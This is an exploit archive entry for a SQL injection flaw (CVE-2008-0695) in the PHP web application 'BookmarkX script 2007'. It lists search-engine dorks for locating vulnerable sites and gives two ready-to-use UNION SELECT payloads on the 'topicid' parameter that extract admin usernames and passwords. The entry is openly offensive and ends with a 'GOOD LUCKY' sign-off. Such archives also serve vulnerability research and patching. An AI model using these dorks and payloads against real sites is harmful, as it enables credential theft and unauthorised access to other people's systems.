BookmarkX script 2007 - 'topicid' SQL Injection
Author: S@BUN
type: webapps
platform: php
port:
date_added: 2008-02-01
date_updated: 2016-11-09
verified: 1
codes: OSVDB-41519;CVE-2008-0695
tags:
aliases:
screenshot_url:
application_url:
#########################################################################
#
# BookmarkX script(Powered by GengoliaWebStudio)SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
# DorKs 1 : "2007 BookmarkX script"
#
# DORKS 2 : Powered by GengoliaWebStudio
#
# DORK 3 : allinurl :"index.php?menu=showtopic"
#
#########################################################################
# EXPLOIT :
#
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
or
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
##########################################################################
# S@BUN www.hackturkiye.com S@BUN #########################################################################
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
# milw0rm.com [2008-02-02]